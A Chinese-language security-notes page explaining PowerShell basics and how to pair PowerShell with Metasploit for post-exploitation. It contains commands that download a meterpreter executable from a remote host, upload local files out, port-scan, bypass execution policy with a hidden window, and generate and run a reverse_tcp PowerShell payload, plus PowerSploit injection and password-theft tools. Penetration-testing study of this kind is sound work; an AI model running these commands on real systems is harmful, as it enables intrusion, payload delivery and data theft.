👻
security
  • 计算机技术
  • OWASP TOP 10
  • 名词解释
  • 1
    • 常见端口利用
    • F5 big-ip从环境搭建到漏洞复现
    • 红队资源
  • About
    • APT
      • 海莲花(APT-C-00)
        • 样本分析
      • 毒云藤(APT-C-01)
        • 大规模钓鱼攻击活动披露
        • 2020上半年针对我重要机构定向攻击活动揭秘
      • 响尾蛇(T-APT-04)
        • 利用WebSocket隧道的新型攻击活动披露
      • 蔓灵花(APT-C-08)
        • 移动平台攻击活动揭露
      • 蓝宝菇(APT-C-12)
        • 组织使用云存储技术发起的最新攻击活动披露
      • 双尾蝎组织(APT-C-23)
        • 针对中东地区的最新攻击活动
      • Lazarus(APT-C-26)
        • 暴风行动 -利用MATA框架针对数字货币行业的攻击活动揭秘
      • Fancy Bear(APT-C-28)
        • 携小众压缩包诱饵对北约、中亚目标的定向攻击分析
      • 肚脑虫组织(APT-C-35)
        • 使用升级版数字武器针对周边地区的攻击活动
        • 针对巴基斯坦的攻击活动
      • 拍拍熊(APT-C-37)
      • 军刀狮(APT-C-38)
      • 蓝色魔眼(APT-C-41)
        • 组织首次针对我国重要机构定向攻击活动披露
      • 美人鱼(Infy)
        • 使用最新的Foudre后门进行攻击活动的分析
    • 各类靶场讲解
      • sqli-labs
      • upload-labs
      • xss-labs
    • CISP题库
    • Docker
      • Docker基线
        • docker基线-概述
        • 推荐一
        • 推荐二
        • 推荐三
        • 推荐四
        • 推荐五
        • 推荐六
      • 命令与选项
      • 基于Docker的固件模拟
      • 固件相关
      • Docker 私有仓库搭建
      • 基础命令的背后
      • 渗透思路调研
      • Docker容器环境检测方法【代码】
    • 浏览器
    • markdown
    • 密码学
    • 内网渗透TIPS
    • 网络扫描
    • 正则表达式
  • 操作系统
    • Android
      • APK终端安全分析法
      • 应用审计指南
        • 通用审计方法
    • IOS
      • 应用审计指南
    • Linux
      • 反弹shell
      • 基线检查
      • SHELL编程
      • 实战技能
    • windows
      • BACKDOOR with 权限维持
      • 磁盘取证实验
      • 基线检查
      • 免杀抓取明文
      • payload下载方式
      • powershell
      • 日志分析
        • 分析工具
      • Untitled
  • 数据库
    • db2
    • mysql
      • webshell写入
      • 基础知识
      • 核心技术
      • 高级应用
    • oracle
      • webshell写入
    • SQLserver
      • webshell写入
  • 中间件
    • apache
      • 基线检查
      • 日志审计
    • iis
      • 基线检查
      • 7.5解析绕过漏洞
    • nginx
      • 基线检查
    • tomcat
      • 基线检查
  • 编程语言
    • C
    • Java
      • webshell
        • 查杀Java web filter型内存马
        • Filter/Servlet型内存马的扫描抓捕与查杀
        • 基于内存 Webshell 的无文件攻击技术研究
        • 基于tomcat的内存 Webshell 无文件攻击技术
        • Tomcat 内存马检测
      • 代码审计
      • 代码审计指南
      • 浅析Java命令执行
      • 相关框架简介及漏洞
    • PHP
      • 代码审计
      • 破解DVWA-admin密码
      • webshell
        • 常见php一句话webshell解析
        • PHP Webshell Hidden Learning
        • Webshell免杀研究
        • Webshell那些事-攻击篇
        • 过D盾webshell分享
      • 相关框架简介及漏洞
    • python
      • 安全编码规范-代码审计
      • 编码规范
      • fishc
      • 某教程涉及脚本
      • POC编写相关
      • python秘籍
        • 上半部分
        • 下半部分
      • 安全方面的内容
        • Python Opcode逃逸笔记
        • 虚拟机逃逸
      • with-EXCEL
      • 相关框架简介及漏洞
      • 源码剖析
        • 多线程和GIL锁
        • Set容器
        • 统一内存管理
        • 信号处理机制
        • 循环垃圾回收器
        • 字符串对象PyStringObject
        • 整数对象PyIntObject
        • 字节码和虚拟机
    • 汇编
    • Javascript
      • Tampermonkey Script
  • AIGC
    • howtouse
  • 网络
    • CCNA
  • 漏洞类型及讲解
    • 综合
    • 技术分享
      • 暴力破解与信息泄露
      • 信息泄露漏洞_java
      • sqli-with-java
      • python远程命令执行与SSRF
    • SQL-Injectoin
    • Cross-Site Scripting
      • 跨站的艺术-XSS入门与介绍
      • 跨站的艺术-XSS Fuzzing 的技巧
      • 给开发者的终极XSS防护备忘录
      • AngularJS特性的 XSS
    • 文件操作
      • 文件包含
  • how-to-use
    • Acunetix(AWVS)
      • 安装到使用
      • 编写AWVS脚本探测web services
      • 简单分析-web方面
      • 流量分析特征
    • burpsuite
      • 导出报告方式
      • captcha-killer
      • FAKE-IP
      • JSFind
      • 编写插件绕过WAF
    • Cobalt Strike
      • Cobalt Strike Powershell过360+Defender上线
    • FOFA
    • GDB
    • PowerSh
      • 获得Powershell命令的历史记录
      • 深入分析PowerShell的两面性
      • 内网渗透利器之PowerSploit
      • PoC:滥用PowerShell Core
      • 如何绕过PowerShell访问限制并实现PowerShell代码执行
      • 工具包
      • 无powershell运行powershell方法总结
    • sheji
    • sqlmap
      • Atlas修改SQLMap tampers 绕过WAF/IDS/IPS
      • 内核分析
      • 检测剖析
      • tamper
      • UDF
      • --os-shell
      • sqlmapapi
      • with burp
      • 网络特征
    • Matlab
    • Metasploit
      • 与Powershell
    • NESSUS
      • 流量分析特征
      • Untitled
    • Network MapTools
      • 流量特征修改
      • 识别主机指纹
    • waf
      • ngx-lua-waf
      • modsecurity
由 GitBook 提供支持
在本页
  • 基本命令
  • powershell使用示例:
  • 使用powershell执行shellcode
  • 使用powershell进行文件的上传、下载和端口扫描
  • powersploit 堪比meterpreter的后渗透攻击框架
  • Metasploit与powershell结合
  • 总结

这有帮助吗?

  1. how-to-use
  2. Metasploit

与Powershell

上一页Metasploit下一页NESSUS

最后更新于4年前

这有帮助吗?

大家都在说windows7的防护水平大大高于windows xp了,但是并不都是如此,Win7下给出现了一个强大高级cmd————>powershell。该shell最大的特点就是支持脚本编程,酷似linux的bash(准确说应该是各种sh),下面就简要介绍下它的功能,以及如何与metasploit配合(今年北美著名的安全会议给出的,这个会议是美国国防部下属的DARPA资助的,内容非常好,建议大家关注):

基本命令

开始–>运行–>powershell 开启powershell界面

get-command *-service 获得服务相关的命令 get-help get service 获得命令的帮助

支持脚本文件的命令集 脚本的后缀名为.PS1,支持管道:

powershell使用示例:

停止所有目前运行中的以”p”字符开头命名的程序:

PS> get-process p* | stop-process

停止所有目前运行中的所有使用大于1000MB存储器的程序:

PS> get-process | where { $_.WS -gt 1000MB } | stop-process

计算一个目录下文件内的字节大小:

PS> get-childitem | measure-object -property length -sum

等待一个叫做”notepad”的程序运行退出:

PS> $processToWatch = get-process notepad
PS> $processToWatch.WaitForExit()

将”hello, world!”字符串转为英文大写字符,成为”HELLO, WORLD!”:

PS> “hello, world!”.ToUpper()

在字符串”string”的第1个字符后插入字符串”ABC”,成为”sABCtring”:

PS> “string”.Insert(1, “ABC”)

订阅一个指定的RSS Feed并显示它最近8个主题:

PS> $rssUrl = “http://blogs.msdn.com/powershell/rss.aspx”
PS> $blog = xml.DownloadString($rssUrl)
PS> $blog.rss.channel.item | select title -first 8

使用powershell执行shellcode

使用dns payloads的方式通过powershell执行meterpreter,达到免杀、过IPS的效果

使用powershell进行文件的上传、下载和端口扫描

下载

ps>Import-Module BitsTransfer
ps>Start-BitsTransfer http://ip/meter.exe c:\meter.exe

上传

Start-BitsTransfer -Source c:\upload.txt -Destination http://ip/upload/upload.txt -transfertype upload

端口扫描

ps c:>1..1024 | %{ echo ((new-object Net.Sockets.TcpClient).Connect(“10.1.1.14”,$)) “$ is open”} 2>$null
25 is open

powersploit 堪比meterpreter的后渗透攻击框架

Carlos Perez国外大牛设计了基于powersploit的渗透脚本集合,用于授权渗透测试使用。。。。(大家都知道怎么回事),里面的主要包含了一下几个脚本

Inject-Dll(注入dll到指定进程)
Inject-Shellcode(注入shellcode到执行进程)
Encrypt- Script(文本或脚本加密)
Get-GPPPassword(通过groups.xml获取明文密码)
Invoke- ReverseDnsLookup(扫描 DNS PTR记录)

Metasploit与powershell结合

* Powershell hashdump(in SET)
* Powershell exec method in MSSQL_Payload * PowerSploit(上面提到了)

绕过powershell本身的权限限制:

-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive —NoProfile -WindowStyle Hidden —File “C:\do_neat_ps_shit.ps1”

使用Metasploit生成Powershell

msf_ payload(reverse_tcp) > generate -t psh -f powershellexec.ps1

使用批处理文件从Meterpreter中运行Powershell

c:\type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\ipinfo2.ps1

示例:

meterpreter > execute -H -f cmd.exe -a ‘/c C:\runps.bat’ Process 28536 created. meterpreter>
–snip–

总结

具体的代码就请查看作者的github代码仓库:

西点军校毕业的这货说windows就是他的backdoor,为什么? 首先就是powershell提供了上传和下载功能,这在渗透过程中能省很多事,其次他说没有见过哪些Meterpreter的事Powershell做不了的,举例:

windows7下的powershell功能不可小觑,应该一起广大安全爱好研究这的研究和重视,后面还会给出相关powershell安全研究的讨论。最后推荐两个博客: :研究powershell中文博客,包含powershell的命令解释、脚本编程的各种小技巧 :国外某大牛博客,对powershell有很多安全方面的研究,国外黑客大会推荐

Derbycon
powerexploit
Chris Gates
中文博客
英文博客